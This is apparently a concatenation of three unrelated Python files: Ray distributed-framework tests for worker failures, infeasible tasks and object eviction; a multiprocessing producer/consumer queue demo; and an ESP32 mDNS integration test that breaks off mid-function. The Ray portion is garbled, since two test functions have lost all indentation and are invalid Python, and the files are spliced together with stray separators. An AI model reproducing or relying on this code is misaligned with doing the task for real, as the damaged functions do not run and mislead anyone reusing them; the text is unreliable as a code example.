def test_actor_worker_dying_future_tasks(ray_start_regular):
    """Tasks submitted both before and after an actor's process is killed
    all fail (no reconstruction allowed)."""
    @ray.remote(max_reconstructions=0)
    class Actor:
        def getpid(self):
            return os.getpid()

        def sleep(self):
            time.sleep(1)

    a = Actor.remote()
    pid = ray.get(a.getpid.remote())
    tasks1 = [a.sleep.remote() for _ in range(10)]
    # SIGKILL the actor process while tasks are queued.
    os.kill(pid, 9)
    time.sleep(0.1)
    tasks2 = [a.sleep.remote() for _ in range(10)]
    for obj in tasks1 + tasks2:
        with pytest.raises(Exception):
            ray.get(obj)

    wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)

def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
    """Even with no task in flight, calling a killed actor fails."""
    @ray.remote(max_reconstructions=0)
    class Actor:
        def getpid(self):
            return os.getpid()

    a = Actor.remote()
    pid = ray.get(a.getpid.remote())
    os.kill(pid, 9)
    time.sleep(0.1)
    task2 = a.getpid.remote()
    with pytest.raises(Exception):
        ray.get(task2)

def test_actor_scope_or_intentionally_killed_message(ray_start_regular):
    """Actors going out of scope or terminated intentionally must NOT
    produce error messages."""
    @ray.remote
    class Actor:
        pass

    # Rebinding drops the first actor (out-of-scope teardown).
    a = Actor.remote()
    a = Actor.remote()
    a.__ray_terminate__.remote()
    time.sleep(1)
    assert len(
        ray.errors()) == 0, ("Should not have propogated an error - {}".format(
            ray.errors()))
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
    "ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory):
    """Evicted implicit-put arguments that cannot be reconstructed push a
    PUT_RECONSTRUCTION error (currently skipped)."""
    num_objects = 3
    object_size = 4 * 10**5

    # Define a task with a single dependency, a numpy array, that returns
    # another array.
    @ray.remote
    def single_dependency(i, arg):
        arg = np.copy(arg)
        arg[0] = i
        return arg

    @ray.remote
    def put_arg_task():
        # Launch num_objects instances of the remote task, each dependent
        # on the one before it. The result of the first task should get
        # evicted.
        args = []
        arg = single_dependency.remote(0, np.zeros(
            object_size, dtype=np.uint8))
        for i in range(num_objects):
            arg = single_dependency.remote(i, arg)
            args.append(arg)

        # Get the last value to force all tasks to finish.
        value = ray.get(args[-1])
        assert value[0] == i

        # Get the first value (which should have been evicted) to force
        # reconstruction. Currently, since we're not able to reconstruct
        # `ray.put` objects that were evicted and whose originating tasks
        # are still running, this for-loop should hang and push an error to
        # the driver.
        ray.get(args[0])

    put_arg_task.remote()

    # Make sure we receive the correct error message.
    wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)

@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
    "ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
    """Same as test_put_error1 but with an explicit ray.put (also skipped)."""
    # This is the same as the previous test, but it calls ray.put directly.
    num_objects = 3
    object_size = 4 * 10**5

    # Define a task with a single dependency, a numpy array, that returns
    # another array.
    @ray.remote
    def single_dependency(i, arg):
        arg = np.copy(arg)
        arg[0] = i
        return arg

    @ray.remote
    def put_task():
        # Launch num_objects instances of the remote task, each dependent
        # on the one before it. The result of the first task should get
        # evicted.
        args = []
        arg = ray.put(np.zeros(object_size, dtype=np.uint8))
        for i in range(num_objects):
            arg = single_dependency.remote(i, arg)
            args.append(arg)

        # Get the last value to force all tasks to finish.
        value = ray.get(args[-1])
        assert value[0] == i

        # Get the first value (which should have been evicted) to force
        # reconstruction. Currently, since we're not able to reconstruct
        # `ray.put` objects that were evicted and whose originating tasks
        # are still running, this for-loop should hang and push an error to
        # the driver.
        ray.get(args[0])

    put_task.remote()

    # Make sure we receive the correct error message.
    wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
def test_version_mismatch(shutdown_only):
    """Starting ray with a mismatched version string pushes a warning."""
    ray_version = ray.__version__
    ray.__version__ = "fake ray version"

    ray.init(num_cpus=1)

    wait_for_errors(ray_constants.VERSION_MISMATCH_PUSH_ERROR, 1)

    # Reset the version.
    ray.__version__ = ray_version

def test_warning_monitor_died(ray_start_2_cpus):
    """Crashing the monitor (via a malformed Redis message) pushes a
    MONITOR_DIED error."""
    @ray.remote
    def f():
        pass

    # Wait for the monitor process to start.
    ray.get(f.remote())
    time.sleep(1)

    # Cause the monitor to raise an exception by pushing a malformed message to
    # Redis. This will probably kill the raylet and the raylet_monitor in
    # addition to the monitor.
    fake_id = 20 * b"\x00"
    malformed_message = "asdf"
    redis_client = ray.worker.global_worker.redis_client
    redis_client.execute_command(
        "RAY.TABLE_ADD", ray.gcs_utils.TablePrefix.Value("HEARTBEAT_BATCH"),
        ray.gcs_utils.TablePubsub.Value("HEARTBEAT_BATCH_PUBSUB"), fake_id,
        malformed_message)

    wait_for_errors(ray_constants.MONITOR_DIED_ERROR, 1)

def test_export_large_objects(ray_start_regular):
    """Pickling an oversized closure (task or actor) pushes a warning."""
    import ray.ray_constants as ray_constants

    large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)

    @ray.remote
    def f():
        large_object

    # Invoke the function so that the definition is exported.
    f.remote()

    # Make sure that a warning is generated.
    wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 1)

    @ray.remote
    class Foo:
        def __init__(self):
            large_object

    Foo.remote()

    # Make sure that a warning is generated.
    wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 2)
@pytest.mark.skipif(RAY_FORCE_DIRECT, reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(shutdown_only):
# Check that we get warning messages for infeasible tasks.
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(2)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
wait_for_errors(ray_constants.RESOURCE_DEADLOCK_ERROR, 1, timeout=30)
def test_warning_for_infeasible_tasks(ray_start_regular):
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
# This actor placement task is infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 2)
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
    """An actor cannot be placed on a 0-CPU cluster, and that infeasibility
    is reported even though the creation task itself needs no CPUs."""
    ray.init(num_cpus=0)

    @ray.remote
    class ZeroCpuActor:
        pass

    # The actor creation should be flagged as infeasible.
    ZeroCpuActor.remote()
    wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
def test_warning_for_too_many_actors(shutdown_only):
    """Starting far more blocking actors than cores warns about the worker
    pool growing too large — once per batch."""
    num_cpus = 2
    ray.init(num_cpus=num_cpus)

    @ray.remote
    class SleepyActor:
        def __init__(self):
            # Block the worker process indefinitely.
            time.sleep(1000)

    [SleepyActor.remote() for _ in range(num_cpus * 3)]
    wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
    [SleepyActor.remote() for _ in range(num_cpus)]
    wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 2)
def test_warning_for_too_many_nested_tasks(shutdown_only):
    """Nested blocked tasks that force many extra workers should warn."""
    num_cpus = 2
    ray.init(num_cpus=num_cpus)

    @ray.remote
    def leaf():
        time.sleep(1000)
        return 1

    @ray.remote
    def middle():
        time.sleep(1)
        ray.get(leaf.remote())

    @ray.remote
    def root():
        # Sleep so the leaf tasks are all submitted to the scheduler after
        # the root tasks.
        time.sleep(1)
        ray.get(middle.remote())

    [root.remote() for _ in range(num_cpus * 4)]
    wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
    """Re-exporting the same remote function/actor class many times should
    log a warning once the duplicate-export threshold is crossed.

    Fixes over the original: the two poll loops busy-waited for up to 10
    seconds at 100% CPU (no sleep); a short sleep is added to each. The
    mid-function ``import io`` is also hoisted to the top of the function.
    """
    import io

    ray.init(num_cpus=1)

    @ray.remote
    def create_remote_function():
        @ray.remote
        def g():
            return 1
        return ray.get(g.remote())

    for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
        ray.get(create_remote_function.remote())

    log_capture_string = io.StringIO()
    ch = logging.StreamHandler(log_capture_string)

    # TODO(rkn): It's terrible to have to rely on this implementation detail,
    # the fact that the warning comes from ray.import_thread.logger. However,
    # I didn't find a good way to capture the output for all loggers
    # simultaneously.
    ray.import_thread.logger.addHandler(ch)

    ray.get(create_remote_function.remote())

    start_time = time.time()
    while time.time() < start_time + 10:
        log_contents = log_capture_string.getvalue()
        if len(log_contents) > 0:
            break
        # Poll gently instead of spinning.
        time.sleep(0.1)

    ray.import_thread.logger.removeHandler(ch)

    assert "remote function" in log_contents
    assert "has been exported {} times.".format(
        ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents

    # Now test the same thing but for actors.
    @ray.remote
    def create_actor_class():
        # Require a GPU so that the actor is never actually created and we
        # don't spawn an unreasonable number of processes.
        @ray.remote(num_gpus=1)
        class Foo:
            pass
        Foo.remote()

    for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
        ray.get(create_actor_class.remote())

    log_capture_string = io.StringIO()
    ch = logging.StreamHandler(log_capture_string)

    # TODO(rkn): As mentioned above, it's terrible to have to rely on this
    # implementation detail.
    ray.import_thread.logger.addHandler(ch)

    ray.get(create_actor_class.remote())

    start_time = time.time()
    while time.time() < start_time + 10:
        log_contents = log_capture_string.getvalue()
        if len(log_contents) > 0:
            break
        time.sleep(0.1)

    ray.import_thread.logger.removeHandler(ch)

    assert "actor" in log_contents
    assert "has been exported {} times.".format(
        ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
    """Exercise the Ray redis module's argument-validation error paths."""
    parts = ray_start_regular["redis_address"].split(":")
    assert len(parts) == 2
    host, port = parts[0], int(parts[1])

    def make_client():
        # Fresh client per command, matching the original behaviour.
        return redis.StrictRedis(
            host=host,
            port=port,
            password=ray_constants.REDIS_DEFAULT_PASSWORD)

    def run_failure_test(expecting_message, *command):
        # The command must be rejected with an error containing the message.
        with pytest.raises(
                Exception, match=".*{}.*".format(expecting_message)):
            make_client().execute_command(*command)

    def run_one_command(*command):
        make_client().execute_command(*command)

    run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
    run_failure_test("Prefix must be in the TablePrefix range",
                     "RAY.TABLE_ADD", 100000, 1, 1, 1)
    run_failure_test("Prefix must be in the TablePrefix range",
                     "RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
    run_failure_test("Prefix must be a valid TablePrefix integer",
                     "RAY.TABLE_ADD", b"a", 1, 1, 1)
    run_failure_test("Pubsub channel must be in the TablePubsub range",
                     "RAY.TABLE_ADD", 1, 10000, 1, 1)
    run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
                     1, b"a", 1, 1)
    # Change the key from 1 to 2, since the previous command should have
    # succeeded at writing the key, but not publishing it.
    run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
                     -1)
    run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
                     b"a")
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
    # Appending a duplicate entry is allowed.
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
    run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
    # Adding a duplicate set entry is allowed.
    run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
    run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
    # Removing an already-removed entry is allowed too.
    run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes):
    """Killing both raylets yields one REMOVED_NODE error per node, naming
    the dead node's ID."""
    cluster = ray_start_cluster_2_nodes
    cluster.wait_for_nodes()
    expected_node_ids = {entry["NodeID"] for entry in ray.nodes()}
    # Give the monitor a chance to receive at least one heartbeat from each
    # node before they are killed.
    time.sleep(0.5)
    # Kill both raylets (second node first, as in the original).
    for node in reversed(cluster.list_all_nodes()):
        node.kill_raylet()
    # Both deaths must be reported.
    wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=40)
    # The node ID is the sixth whitespace-separated token of the message;
    # this needs updating if the error text ever changes.
    reported_node_ids = {
        err["message"].split(" ")[5]
        for err in relevant_errors(ray_constants.REMOVED_NODE_ERROR)
    }
    assert expected_node_ids == reported_node_ids
def test_raylet_crash_when_get(ray_start_regular):
    """A pending ray.get on a never-created object raises once the raylet
    dies underneath it."""
    def kill_raylet_after_delay():
        # Give the default workers time to connect before killing the raylet.
        time.sleep(2)
        ray.worker._global_node.kill_raylet()

    killer = threading.Thread(target=kill_raylet_after_delay)
    killer.start()
    with pytest.raises(ray.exceptions.UnreconstructableError):
        ray.get(ray.ObjectID.from_random())
    killer.join()
def test_connect_with_disconnected_node(shutdown_only):
    """REMOVED_NODE errors fire for SIGKILLed nodes, but not for nodes that
    exit gracefully; no RAYLET_CONNECTION_ERROR should ever appear."""
    config = json.dumps({
        "num_heartbeats_timeout": 50,
        "raylet_heartbeat_timeout_milliseconds": 10,
    })
    cluster = Cluster()
    cluster.add_node(num_cpus=0, _internal_config=config)
    ray.init(address=cluster.address)
    assert len(relevant_errors(ray_constants.REMOVED_NODE_ERROR)) == 0
    # Two nodes killed by SIGKILL: each is marked dead by ray_monitor.
    for expected_count in (1, 2):
        dead_node = cluster.add_node(num_cpus=0, _internal_config=config)
        cluster.remove_node(dead_node, allow_graceful=False)
        wait_for_errors(
            ray_constants.REMOVED_NODE_ERROR, expected_count, timeout=2)
    # A node removed by SIGTERM (graceful) must not be reported again.
    removing_node = cluster.add_node(num_cpus=0, _internal_config=config)
    cluster.remove_node(removing_node, allow_graceful=True)
    with pytest.raises(RayTestTimeoutException):
        wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 3, timeout=2)
    # There is no connection error to a dead node.
    assert len(relevant_errors(ray_constants.RAYLET_CONNECTION_ERROR)) == 0
@pytest.mark.parametrize(
    "ray_start_cluster_head", [{
        "num_cpus": 5,
        "object_store_memory": 10**8
    }],
    indirect=True)
@pytest.mark.parametrize("num_actors", [1, 2, 5])
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head, num_actors):
    """Actors repeatedly returning results that each fill half the object
    store should all complete via eviction/retry."""
    @ray.remote
    class LargeMemoryActor:
        def some_expensive_task(self):
            # Half of the configured object store per result.
            return np.zeros(10**8 // 2, dtype=np.uint8)

    actors = [LargeMemoryActor.remote() for _ in range(num_actors)]
    for _ in range(10):
        in_flight = [actor.some_expensive_task.remote() for actor in actors]
        while in_flight:
            [finished], in_flight = ray.wait(in_flight, num_returns=1)
@pytest.mark.parametrize(
    "ray_start_cluster_head", [{
        "num_cpus": 2,
        "object_store_memory": 10**8
    }],
    indirect=True)
def test_fill_object_store_exception(ray_start_cluster_head):
    """A result larger than the object store raises without killing the
    actor; an oversized ray.put raises ObjectStoreFullError."""
    @ray.remote
    class LargeMemoryActor:
        def some_expensive_task(self):
            # Deliberately larger than the configured object store.
            return np.zeros(10**8 + 2, dtype=np.uint8)

        def test(self):
            return 1

    actor = LargeMemoryActor.remote()
    with pytest.raises(ray.exceptions.RayTaskError):
        ray.get(actor.some_expensive_task.remote())
    # The failed task must not have killed the actor.
    ray.get(actor.test.remote())
    with pytest.raises(ray.exceptions.ObjectStoreFullError):
        ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
@pytest.mark.parametrize(
    "ray_start_cluster", [{
        "num_nodes": 1,
        "num_cpus": 2,
    }, {
        "num_nodes": 2,
        "num_cpus": 1,
    }],
    indirect=True)
def test_direct_call_eviction(ray_start_cluster):
    """After ray.internal.free, direct ray.get and by-reference task
    arguments must both fail."""
    @ray.remote
    def large_object():
        return np.zeros(10 * 1024 * 1024)

    obj = large_object.remote()
    assert isinstance(ray.get(obj), np.ndarray)

    # Evict the object, then wait until it really leaves the store.
    ray.internal.free([obj])
    while ray.worker.global_worker.core_worker.object_exists(obj):
        time.sleep(1)

    # A direct ray.get now raises.
    with pytest.raises(ray.exceptions.UnreconstructableError):
        ray.get(obj)

    @ray.remote
    def dependent_task(x):
        return

    # Passing the evicted object by reference makes the task fail too.
    with pytest.raises(ray.exceptions.RayTaskError):
        ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
    "ray_start_cluster", [{
        "num_nodes": 1,
        "num_cpus": 2,
    }, {
        "num_nodes": 2,
        "num_cpus": 1,
    }],
    indirect=True)
def test_direct_call_serialized_id_eviction(ray_start_cluster):
    # An ObjectID received *inside* a task (serialized in the argument list)
    # can be freed from within that task; a subsequent ray.get on it must
    # then raise UnreconstructableError.
    @ray.remote
    def large_object():
        return np.zeros(10 * 1024 * 1024)

    @ray.remote
    def get(obj_ids):
        obj_id = obj_ids[0]
        assert (isinstance(ray.get(obj_id), np.ndarray))
        # Wait for the object to be evicted.
        # NOTE(review): free() is given a bare ObjectID here but a list at
        # the driver call below — confirm the API accepts both forms.
        ray.internal.free(obj_id)
        while ray.worker.global_worker.core_worker.object_exists(obj_id):
            time.sleep(1)
        with pytest.raises(ray.exceptions.UnreconstructableError):
            ray.get(obj_id)
        print("get done", obj_ids)

    obj = large_object.remote()
    result = get.remote([obj])
    # The driver frees its handle as well; the task above frees independently.
    ray.internal.free(obj)
    ray.get(result)
@pytest.mark.parametrize(
    "ray_start_cluster", [{
        "num_nodes": 2,
        "num_cpus": 1,
    }, {
        "num_nodes": 1,
        "num_cpus": 2,
    }],
    indirect=True)
def test_serialized_id(ray_start_cluster):
    """ObjectIDs serialized inside arguments resolve correctly, for both
    task-produced and ray.put objects, directly and via a dependent task."""
    @ray.remote
    def small_object():
        # Sleep a bit before creating the object to force a timeout
        # at the getter.
        time.sleep(1)
        return 1

    @ray.remote
    def dependent_task(x):
        return x

    @ray.remote
    def get(obj_ids, test_dependent_task):
        print("get", obj_ids)
        obj_id = obj_ids[0]
        if test_dependent_task:
            assert ray.get(dependent_task.remote(obj_id)) == 1
        else:
            assert ray.get(obj_id) == 1

    # Same four combinations as the original, in the same order:
    # task-produced {direct, via dependent}, then ray.put {direct, via dep.}.
    for producer in (small_object.remote, lambda: ray.put(1)):
        for via_dependent in (False, True):
            ray.get(get.remote([producer()], via_dependent))
if __name__ == "__main__":
    # Allow running this test file directly with pytest's verbose output.
    import pytest
    sys.exit(pytest.main(["-v", __file__]))
|
proc_5.py | # -*- coding: utf-8 -*-
# @Time : 2021/3/16 20:25
# @Author : sen
from multiprocessing import Process, Queue
import os, time, random
# Code executed by the writer (producer) process:
def write(q):
    """Put 'A', 'B', 'C' on the queue with a random pause after each."""
    print('Process to write: %s' % os.getpid())
    for item in ['A', 'B', 'C']:
        print('Put %s to queue...' % item)
        q.put(item)
        time.sleep(random.random())
# Code executed by the reader (consumer) process:
def read(q):
    """Block on the queue forever, echoing each received value."""
    print('Process to read: %s' % os.getpid())
    while True:
        item = q.get(True)
        print('Get %s from queue.' % item)
if __name__=='__main__':
    # The parent process creates the Queue and hands it to both children.
    q = Queue()
    writer = Process(target=write, args=(q,))
    reader = Process(target=read, args=(q,))
    # Start the writer, then the reader.
    writer.start()
    reader.start()
    # Wait for the writer to finish.
    writer.join()
    # The reader loops forever, so it cannot be joined; terminate it.
    reader.terminate()
app_test.py | # SPDX-FileCopyrightText: 2021 Espressif Systems (Shanghai) CO LTD
# SPDX-License-Identifier: Apache-2.0
import re
import select
import socket
import struct
import time
from threading import Event, Thread
import dpkt
import dpkt.dns
import ttfw_idf
from tiny_test_fw.Utility import console_log
UDP_PORT = 5353  # standard mDNS port
MCAST_GRP = '224.0.0.251'  # standard mDNS IPv4 multicast group
# This service is created from esp board startup
SERVICE_NAME = u'ESP32-WebServer._http._tcp.local'
SUB_SERVICE_NAME = u'_server._sub._http._tcp.local'
# This host name answer sent by host, when there is query from board
HOST_NAME = u'tinytester.local'
# This service answer sent by host, when there is query from board
MDNS_HOST_SERVICE = u'ESP32._http._tcp.local'
# Events coordinating the test with the mdns_listener thread.
stop_mdns_listener = Event()
start_mdns_listener = Event()
esp_service_answered = Event()
esp_sub_service_answered = Event()
esp_host_answered = Event()
esp_delegated_host_answered = Event()
# Get query of ESP32-WebServer._http._tcp.local service
def get_mdns_service_query(service):  # type:(str) -> dpkt.dns.Msg
    """Build and pack an mDNS SRV query for the given service name."""
    query = dpkt.dns.DNS()
    query.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
    query.rcode = dpkt.dns.DNS_RCODE_NOERR
    record = dpkt.dns.DNS.RR()
    record.cls = dpkt.dns.DNS_IN
    record.type = dpkt.dns.DNS_SRV
    record.name = service
    record.target = socket.inet_aton('127.0.0.1')
    record.srvname = service
    query.qd.append(record)
    console_log('Created mdns service query: {} '.format(query.__repr__()))
    return query.pack()
# Get query of _server._sub._http._tcp.local sub service
def get_mdns_sub_service_query(sub_service):  # type:(str) -> dpkt.dns.Msg
    """Build and pack an mDNS PTR query for the given service subtype."""
    query = dpkt.dns.DNS()
    query.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
    query.rcode = dpkt.dns.DNS_RCODE_NOERR
    record = dpkt.dns.DNS.RR()
    record.cls = dpkt.dns.DNS_IN
    record.type = dpkt.dns.DNS_PTR
    record.name = sub_service
    record.target = socket.inet_aton('127.0.0.1')
    record.ptrname = sub_service
    query.qd.append(record)
    console_log('Created mdns subtype service query: {} '.format(query.__repr__()))
    return query.pack()
# Get query for host resolution
def get_dns_query_for_esp(esp_host):  # type:(str) -> dpkt.dns.Msg
    """Build and pack a DNS query for `<esp_host>.local`."""
    query = dpkt.dns.DNS()
    record = dpkt.dns.DNS.RR()
    record.cls = dpkt.dns.DNS_IN
    record.name = esp_host + u'.local'
    query.qd.append(record)
    console_log('Created query for esp host: {} '.format(query.__repr__()))
    return query.pack()
# Get mdns answer for host resolution
def get_dns_answer_to_mdns(tester_host):  # type:(str) -> dpkt.dns.Msg
    """Build and pack an mDNS A-record answer mapping tester_host to
    127.0.0.1."""
    answer = dpkt.dns.DNS()
    answer.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
    answer.rcode = dpkt.dns.DNS_RCODE_NOERR
    record = dpkt.dns.DNS.RR()
    record.cls = dpkt.dns.DNS_IN
    record.type = dpkt.dns.DNS_A
    record.name = tester_host
    record.ip = socket.inet_aton('127.0.0.1')
    answer.an.append(record)
    console_log('Created answer to mdns query: {} '.format(answer.__repr__()))
    return answer.pack()
# Get mdns answer for service query
def get_dns_answer_to_service_query(mdns_service):  # type:(str) -> dpkt.dns.Msg
    """Build and pack an mDNS SRV answer for mdns_service at 127.0.0.1:100."""
    answer = dpkt.dns.DNS()
    answer.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
    answer.rcode = dpkt.dns.DNS_RCODE_NOERR
    record = dpkt.dns.DNS.RR()
    record.name = mdns_service
    record.cls = dpkt.dns.DNS_IN
    record.type = dpkt.dns.DNS_SRV
    record.priority = 0
    record.weight = 0
    record.port = 100
    record.srvname = mdns_service
    record.ip = socket.inet_aton('127.0.0.1')
    answer.an.append(record)
    console_log('Created answer to mdns query: {} '.format(answer.__repr__()))
    return answer.pack()
def mdns_listener(esp_host):  # type:(str) -> None
    """Listen on the mDNS multicast group until stop_mdns_listener is set:
    answer queries coming from the board, and record (via the module-level
    Events) which answers the board itself sent.

    Fixes over the original:
    - the HOST_NAME query-handling block was duplicated verbatim, so every
      host-name query was answered twice; it is handled once now.
    - the socket setup duplicated create_socket(); it now calls it.
    """
    print('mdns_listener thread started')
    sock = create_socket()
    last_query_timepoint = time.time()
    QUERY_TIMEOUT = 0.2
    while not stop_mdns_listener.is_set():
        try:
            start_mdns_listener.set()
            current_time = time.time()
            if current_time - last_query_timepoint > QUERY_TIMEOUT:
                last_query_timepoint = current_time
            timeout = max(0, QUERY_TIMEOUT - (current_time - last_query_timepoint))
            read_socks, _, _ = select.select([sock], [], [], timeout)
            if not read_socks:
                continue
            data, _ = sock.recvfrom(1024)
            dns = dpkt.dns.DNS(data)
            if len(dns.qd) > 0:
                # Board is asking for our host name: answer with 127.0.0.1.
                if dns.qd[0].name == HOST_NAME:
                    console_log('Received query: {} '.format(dns.__repr__()))
                    sock.sendto(get_dns_answer_to_mdns(HOST_NAME), (MCAST_GRP,UDP_PORT))
                # Board is asking for our service: answer with an SRV record.
                if dns.qd[0].name == MDNS_HOST_SERVICE:
                    print(dns.qd[0].name)
                    console_log('Received query: {} '.format(dns.__repr__()))
                    sock.sendto(get_dns_answer_to_service_query(MDNS_HOST_SERVICE), (MCAST_GRP,UDP_PORT))
            if len(dns.an) == 1:
                if dns.an[0].name == SERVICE_NAME:
                    console_log('Received answer to service query: {}'.format(dns.__repr__()))
                    esp_service_answered.set()
            if len(dns.an) > 1:
                if dns.an[1].name == SUB_SERVICE_NAME:
                    console_log('Received answer for sub service query: {}'.format(dns.__repr__()))
                    esp_sub_service_answered.set()
            if len(dns.an) > 0 and dns.an[0].type == dpkt.dns.DNS_A:
                if dns.an[0].name == esp_host + u'.local':
                    console_log('Received answer to esp32-mdns query: {}'.format(dns.__repr__()))
                    esp_host_answered.set()
                if dns.an[0].name == esp_host + u'-delegated.local':
                    console_log('Received answer to esp32-mdns-delegate query: {}'.format(dns.__repr__()))
                    esp_delegated_host_answered.set()
        except socket.timeout:
            # NOTE(review): the socket is non-blocking, so socket.timeout
            # should never fire; kept defensively from the original.
            break
        except dpkt.UnpackError:
            continue
def create_socket():  # type:() -> socket.socket
    """Return a non-blocking UDP socket bound to the mDNS port and joined
    to the mDNS multicast group."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for option in (socket.SO_REUSEADDR, socket.SO_REUSEPORT):
        sock.setsockopt(socket.SOL_SOCKET, option, 1)
    sock.setblocking(False)
    sock.bind(('0.0.0.0', UDP_PORT))
    membership = struct.pack('4sl', socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership)
    return sock
def test_query_dns_http_service(service):  # type: (str) -> None
    """Send an SRV query for `service`; fail unless the board's answer is
    seen by the listener within 25 s.

    Fix: the query socket is closed after sending — the original leaked one
    multicast socket per call (answers arrive on the listener's socket).
    """
    print('SRV: Query {}'.format(service))
    sock = create_socket()
    try:
        sock.sendto(get_mdns_service_query(service), (MCAST_GRP,UDP_PORT))
    finally:
        sock.close()
    if not esp_service_answered.wait(timeout=25):
        raise ValueError('Test has failed: did not receive mdns answer within timeout')
def test_query_dns_sub_service(sub_service):  # type: (str) -> None
    """Send a PTR query for `sub_service`; fail unless answered within 25 s.

    Fix: the query socket is closed after sending (resource leak in the
    original).
    """
    print('PTR: Query {}'.format(sub_service))
    sock = create_socket()
    try:
        sock.sendto(get_mdns_sub_service_query(sub_service), (MCAST_GRP,UDP_PORT))
    finally:
        sock.close()
    if not esp_sub_service_answered.wait(timeout=25):
        raise ValueError('Test has failed: did not receive mdns answer within timeout')
def test_query_dns_host(esp_host):  # type: (str) -> None
    """Send an A query for the board's host name; fail unless answered
    within 25 s.

    Fix: the query socket is closed after sending (resource leak in the
    original).
    """
    print('A: {}'.format(esp_host))
    sock = create_socket()
    try:
        sock.sendto(get_dns_query_for_esp(esp_host), (MCAST_GRP,UDP_PORT))
    finally:
        sock.close()
    if not esp_host_answered.wait(timeout=25):
        raise ValueError('Test has failed: did not receive mdns answer within timeout')
def test_query_dns_host_delegated(esp_host):  # type: (str) -> None
    """Send an A query for the board's delegated host name; fail unless
    answered within 25 s.

    Fix: the query socket is closed after sending (resource leak in the
    original).
    """
    print('A: {}'.format(esp_host))
    sock = create_socket()
    try:
        sock.sendto(get_dns_query_for_esp(esp_host + '-delegated'), (MCAST_GRP,UDP_PORT))
    finally:
        sock.close()
    if not esp_delegated_host_answered.wait(timeout=25):
        raise ValueError('Test has failed: did not receive mdns answer within timeout')
@ttfw_idf.idf_custom_test(env_tag='Example_WIFI', group='test-apps')
def test_app_esp_mdns(env, _):  # type: (ttfw_idf.TinyFW.Env, None) -> None
    """End-to-end mDNS test: flash the app, run a host-side mDNS listener
    thread, and exercise queries in both directions (host->board and
    board->host)."""
    dut1 = env.get_dut('mdns', 'tools/test_apps/protocols/mdns', dut_class=ttfw_idf.ESP32DUT)
    # 1. start mdns application
    dut1.start_app()
    # 2. get the dut host name (and IP address)
    specific_host = dut1.expect(re.compile(r'mdns hostname set to: \[([^\]]+)\]'), timeout=30)[0]
    esp_ip = dut1.expect(re.compile(r' IPv4 address: ([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)'), timeout=30)
    print('Got IP={}'.format(esp_ip[0]))
    mdns_responder = Thread(target=mdns_listener, args=(str(specific_host),))

    def start_case(case, desc, result):  # type: (str, str, str) -> None
        # Drive one console-selected test case on the DUT and wait for the
        # expected result line.
        print('Starting {}: {}'.format(case, desc))
        dut1.write(case)
        dut1.expect(re.compile(result), timeout=10)

    try:
        # start the host-side dns listener thread
        mdns_responder.start()
        # wait until the mdns listener thread has started
